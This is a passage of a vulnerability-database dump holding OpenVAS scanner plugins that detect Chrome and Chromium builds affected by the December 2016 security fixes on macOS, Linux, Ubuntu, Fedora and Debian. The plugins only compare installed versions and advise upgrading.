PDFium.\n\n - The multiple address spoofing errors in Omnibox.\n\n - An integer overflow error in ANGLE.\n\n - A local file access error in PDFium.\n\n - A CSP Referrer disclosure error.\n\n - An integer overflow error in PDFium.\n\n - A CSP bypass error in Blink.\n\n - A same-origin bypass error in SVG.\n\n - The various fixes from internal audits, fuzzing and other initiatives.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass security, obtain\n sensitive information and to execute arbitrary code or cause denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 55.0.2883.75 on MAC OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 55.0.2883.75 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://googlechromereleases.blogspot.in/2016/12/stable-channel-update-for-desktop.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"55.0.2883.75\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"55.0.2883.75\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:37:23", "bulletinFamily": "scanner", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2016-12-05T00:00:00", "id": "OPENVAS:1361412562310810229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810229", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Linux", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Linux\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810229\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 12:51:42 +0530 (Mon, 05 Dec 2016)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2016-12)-Linux\");\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exist due to,\n\n - A private property access error in V8.\n\n - The multiple universal XSS errors in Blink.\n\n - A same-origin bypass error in PDFium.\n\n - An out of bounds write error in Blink.\n\n - The multiple use after free errors.\n\n - An out of bounds write error in PDFium.\n\n - A local file disclosure error in DevTools.\n\n - A file download protection bypass error.\n\n - The usage of unvalidated data in PDFium.\n\n - The multiple address spoofing errors in Omnibox.\n\n - An integer overflow error in ANGLE.\n\n - A local file access error in PDFium.\n\n - A CSP Referrer disclosure error.\n\n - An integer overflow error in PDFium.\n\n - A CSP bypass error in Blink.\n\n - A same-origin bypass error in SVG.\n\n - The various fixes from internal audits, fuzzing and other initiatives.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of these\n vulnerabilities will allow remote attackers to bypass security, obtain\n sensitive information and to execute arbitrary code or cause denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 55.0.2883.75 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 55.0.2883.75 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://googlechromereleases.blogspot.in/2016/12/stable-channel-update-for-desktop.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chr_ver = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chr_ver, test_version:\"55.0.2883.75\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"55.0.2883.75\");\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:37:27", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-10T00:00:00", "id": "OPENVAS:1361412562310842990", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842990", "title": "Ubuntu Update for oxide-qt USN-3153-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for oxide-qt USN-3153-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842990\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-10 06:13:45 +0100 (Sat, 10 Dec 2016)\");\n script_cve_id(\"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5207\", \"CVE-2016-5208\",\n \t\t\"CVE-2016-5209\", \"CVE-2016-5212\", \"CVE-2016-5215\", \"CVE-2016-5222\",\n\t\t\"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\",\n\t\t\"CVE-2016-9652\", \"CVE-2016-5213\", \"CVE-2016-5219\", \"CVE-2016-9651\",\n\t\t\"CVE-2016-5221\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for oxide-qt USN-3153-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were discovered\n in Chromium. If a user were tricked in to opening a specially crafted website,\n an attacker could potentially exploit these to conduct cross-site scripting\n (XSS) attacks, read uninitialized memory, obtain sensitive information, spoof\n the webview URL, bypass same origin restrictions, cause a denial of service\nvia application crash, or execute arbitrary code. (CVE-2016-5204,\nCVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5209, CVE-2016-5212,\nCVE-2016-5215, CVE-2016-5222, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226,\nCVE-2016-9650, CVE-2016-9652)\n\nMultiple vulnerabilities were discovered in V8. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit these to obtain sensitive information, cause a denial of service\nvia application crash, or execute arbitrary code. (CVE-2016-5213,\nCVE-2016-5219, CVE-2016-9651)\n\nAn integer overflow was discovered in ANGLE. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthis to cause a denial of service via application crash, or execute\narbitrary code. (CVE-2016-5221)\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 16.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3153-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3153-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|16\\.10|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.19.4-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.19.4-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.19.4-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.19.4-0ubuntu0.16.10.1\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.19.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.19.4-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:38:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-16T00:00:00", "id": "OPENVAS:1361412562310872153", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872153", "title": "Fedora Update for chromium FEDORA-2016-e0e1cb2b2b", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for chromium FEDORA-2016-e0e1cb2b2b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872153\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-16 06:04:03 +0100 (Fri, 16 Dec 2016)\");\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\",\n \"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for chromium FEDORA-2016-e0e1cb2b2b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"chromium on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-e0e1cb2b2b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZZECS3A7ULG4B4YXBKUZMA3NTQBE5HGU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~55.0.2883.87~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-22T16:38:15", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-16T00:00:00", "id": "OPENVAS:1361412562310872151", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872151", "title": "Fedora Update for chromium FEDORA-2016-a815b7bf5d", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for chromium FEDORA-2016-a815b7bf5d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872151\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-16 06:03:15 +0100 (Fri, 16 Dec 2016)\");\n script_cve_id(\"CVE-2016-5199\", \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\",\n \"CVE-2016-9651\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5206\",\n \"CVE-2016-5205\", \"CVE-2016-5204\", \"CVE-2016-5209\", \"CVE-2016-5203\",\n \"CVE-2016-5210\", \"CVE-2016-5212\", \"CVE-2016-5211\", \"CVE-2016-5213\",\n \"CVE-2016-5214\", \"CVE-2016-5216\", \"CVE-2016-5215\", \"CVE-2016-5217\",\n \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5220\",\n \"CVE-2016-5222\", \"CVE-2016-9650\", \"CVE-2016-5223\", \"CVE-2016-5226\",\n \"CVE-2016-5225\", \"CVE-2016-5224\", \"CVE-2016-9652\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for chromium FEDORA-2016-a815b7bf5d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"chromium on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-a815b7bf5d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LGZO2VOGJOZUUXNQITD6YMIUQ2L5GTU\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~55.0.2883.87~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:13", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-04-18T00:00:00", "id": "OPENVAS:1361412562310872576", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872576", "title": "Fedora Update for qt5-qtwebengine FEDORA-2017-ae1fde5fb8", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for qt5-qtwebengine FEDORA-2017-ae1fde5fb8\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872576\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-18 06:41:53 +0200 (Tue, 18 Apr 2017)\");\n script_cve_id(\"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5189\", \"CVE-2016-5199\",\n \"CVE-2016-5201\", \"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\",\n \"CVE-2016-5206\", \"CVE-2016-5208\", \"CVE-2016-5207\", \"CVE-2016-5210\",\n \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\",\n \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\",\n \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\",\n \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-9650\", \"CVE-2016-9651\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for qt5-qtwebengine FEDORA-2017-ae1fde5fb8\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'qt5-qtwebengine'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"qt5-qtwebengine on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-ae1fde5fb8\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OMW5DLNYQFXDPKYD4LA66HQALQTPX54B\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"qt5-qtwebengine\", rpm:\"qt5-qtwebengine~5.8.0~8.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-22T16:36:37", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\ndiscovered in the chromium web browser.\n\nCVE-2016-5181\nA cross-site scripting issue was discovered.\n\nCVE-2016-5182\nGiwan Go discovered a heap overflow issue.\n\nCVE-2016-5183\nA use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5184\nAnother use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5185\ncloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2016-5186\nAbdulrahman Alqabandi discovered an out-of-bounds read issue in the\ndeveloper tools.\n\nCVE-2016-5187\nLuan Herrera discovered a URL spoofing issue.\n\nDescription truncated. Please see the references for more information.", "modified": "2019-03-18T00:00:00", "published": "2016-12-11T00:00:00", "id": "OPENVAS:1361412562310703731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703731", "title": "Debian Security Advisory DSA 3731-1 (chromium-browser - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3731.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3731-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703731\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2016-5181\", \"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5184\",\n \"CVE-2016-5185\", \"CVE-2016-5186\", \"CVE-2016-5187\", \"CVE-2016-5188\",\n \"CVE-2016-5189\", \"CVE-2016-5190\", \"CVE-2016-5191\", \"CVE-2016-5192\",\n \"CVE-2016-5193\", \"CVE-2016-5194\", \"CVE-2016-5198\", \"CVE-2016-5199\",\n \"CVE-2016-5200\", \"CVE-2016-5201\", \"CVE-2016-5202\", \"CVE-2016-5203\",\n \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\",\n \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\",\n \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\",\n \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\",\n \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\",\n \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\",\n \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_name(\"Debian Security Advisory DSA 3731-1 (chromium-browser - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-11 00:00:00 +0100 (Sun, 11 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3731.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 55.0.2883.75-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 55.0.2883.75-1.\n\nWe recommend that you upgrade your 